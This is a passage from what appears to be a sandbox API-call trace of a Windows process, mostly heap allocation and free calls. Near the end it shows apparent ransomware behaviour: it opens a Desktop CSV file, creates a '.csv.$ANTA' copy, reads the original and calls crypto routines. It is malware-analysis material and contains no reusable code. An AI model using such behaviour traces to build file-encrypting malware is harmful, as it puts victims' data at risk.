out: hHeap=0x1780000) returned 1 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0126.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0126.171] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0126.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0126.172] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0126.172] CryptDestroyHash (hHash=0x41ac640) returned 1 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0126.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0126.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0126.174] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0126.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0126.176] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0126.176] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0126.176] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0126.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0126.177] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uaY41mSq.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\uay41msq.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0126.177] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.177] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0126.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0126.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0126.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0126.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0126.177] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0126.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0126.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0126.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0126.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0126.177] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0126.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0126.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0126.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0126.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0126.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0126.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0126.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0126.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0126.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0126.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0126.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0126.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0126.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0126.231] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0126.231] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uaY41mSq.csv.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\uay41msq.csv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0126.234] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0126.234] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0126.236] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x1885, lpOverlapped=0x0) returned 1 [0126.237] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0126.239] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0126.239] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0126.239] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0126.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0126.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0126.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0126.241] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 